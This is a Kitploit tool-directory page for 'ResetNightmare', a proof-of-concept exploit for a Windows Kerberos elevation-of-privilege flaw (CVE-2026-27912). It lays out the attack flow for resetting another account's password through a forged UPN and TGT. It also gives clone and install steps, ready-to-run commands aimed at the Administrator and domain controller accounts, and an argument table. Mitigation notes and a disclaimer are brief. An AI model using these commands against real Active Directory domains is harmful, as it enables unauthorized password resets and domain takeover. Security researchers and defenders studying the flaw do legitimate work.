Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Kerberos-CVE-2026-27912 — PoC for CVE-2026-27912 - Windows Kerberos Elevation of Privilege (ResetNightmare). Unauthorized password reset via Kerberos flaw. For security research only. | Kitploit
Tools/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Authentication & AuthorizationPrivilege EscalationPassword AttacksExploitationPenetration Testing
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC for CVE-2026-27912 - Windows Kerberos Elevation of Privilege (ResetNightmare). Unauthorized password reset via Kerberos flaw. For security research only.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
2926 days agoNot yet reviewed

Kerberos-CVE-2026-27912

CVE-2026-27912 - Windows Kerberos Elevation of Privilege Vulnerability

ResetNightmare - Unauthorized password reset via Kerberos Change Password protocol flaw.


📋 Details

FieldValue
CVECVE-2026-27912
TitleWindows Kerberos Elevation of Privilege Vulnerability
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Improper Authorization
PublishedApril 14, 2026
PatchedApril 2026

🔍 Attack Flow

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Requirements

  • Windows with PowerShell
  • ActiveDirectory module (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (download from GhostPack/Rubeus)
  • Network access to Domain Controller

🚀 Installation

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Usage

Basic Attack

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Target Computer Account

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Create New Account

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Verbose Mode

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Arguments


🛡️ Mitigation

  1. Apply the official patch from Microsoft Security Update
  2. Segment network to limit adjacent network access
  3. Enforce least privilege - restrict UPN write permissions
  4. Monitor for suspicious UPN changes and password resets

⚠️ Disclaimer

For authorized security testing and educational research only.

Unauthorized access to computer systems is illegal. The author assumes no liability for misuse of this software.


📚 References

  • NVD: CVE-2026-27912
  • Microsoft Security Update Guide

👨‍💻 Author

n0vax1337 / Security Researcher


📄 License

MIT License - see LICENSE


Last Updated: 2026

Download Tool
FlagDescriptionDefault
-t / --targetTarget account namerequired
-p / --new-passwordNew password for targetrequired
-u / --upn-userAccount to set fake UPN onrequired
-up / --upn-passwordPassword for UPN accountrequired
-c / --computerUPNUser is a computer accountflag
-r / --rubeus-pathPath to Rubeus.exeRubeus.exe
-e / --encryptionSupported encryption typeAES256
-path / --create-pathOU path to create new account""
-d / --dcDomain Controller nameauto-detect
-v / --verboseVerbose outputflag